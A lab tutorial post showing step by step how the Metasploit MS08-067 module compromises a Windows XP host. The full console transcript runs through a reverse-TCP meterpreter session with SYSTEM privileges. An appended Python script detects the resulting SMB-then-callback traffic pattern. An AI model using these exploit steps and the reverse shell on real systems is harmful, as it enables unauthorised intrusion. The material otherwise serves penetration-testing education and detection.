This post briefly describes how to use Metasploit to run a penetration test against MS08-067; for learning purposes only.
| Test environment | Description | IP |
|---|---|---|
| Attacking host | Kali 2020 | 192.168.1.113 |
| Target host | Windows XP SP3 | 192.168.1.108 |
① Start msf and search for ms08_067
```
msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 >
```
② Select the ms08_067 module and set its parameters. Here I set target to 34; for other OS versions, use show targets to list the available targets.
```
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.108
rhost => 192.168.1.108
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
```
③ Run the exploit, obtain a meterpreter session and escalate privileges
```
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.108:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.108:2354) at 2021-05-20 08:55:20 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
```
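As an added defensive example (not part of the original post), the following Python script correlates constructed connection-log records to flag the pattern visible in the transcript above: an inbound connection to tcp/445 on a host, followed within a short window by an outbound connection from that host back to the same peer on a non-standard port (the reverse_tcp callback to LPORT 4444). The log line format, the 60-second window and the benign-port list are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample flow log (assumed format): timestamp src sport dst dport.
# Lines 1-2 mirror the transcript above: SMB contact on 445, then a callback to 4444.
# Lines 3-4 are benign: SMB contact followed by ordinary web traffic to the same peer.
SAMPLE_FLOWS = """\
2021-05-20T08:55:18 192.168.1.113 50212 192.168.1.108 445
2021-05-20T08:55:20 192.168.1.108 2354 192.168.1.113 4444
2021-05-20T08:55:21 192.168.1.50 50300 192.168.1.108 445
2021-05-20T08:56:30 192.168.1.108 2400 192.168.1.50 80
"""


def parse_flows(text):
    """Parse the constructed log format into (time, src, sport, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return flows


def find_reverse_after_smb(flows, window=timedelta(seconds=60), benign_ports=(80, 443)):
    """Return one (victim, peer, smb_time, callback_time, callback_port) tuple for
    every inbound tcp/445 connection that is followed within `window` by an
    outbound connection from the same victim back to the same peer on a port
    not in `benign_ports`."""
    alerts = []
    smb_inbound = [f for f in flows if f[4] == 445]
    for ts, peer, _, victim, _ in smb_inbound:
        for ts2, src, _, dst, dport in flows:
            if (src == victim and dst == peer and dport not in benign_ports
                    and ts <= ts2 <= ts + window):
                alerts.append((victim, peer, ts, ts2, dport))
    return alerts


if __name__ == "__main__":
    for alert in find_reverse_after_smb(parse_flows(SAMPLE_FLOWS)):
        print("possible reverse connection after SMB contact:", alert)
```

On the constructed sample this reports exactly one hit, the 192.168.1.108 to 192.168.1.113:4444 callback two seconds after the SMB connection; the web traffic to 192.168.1.50 is ignored.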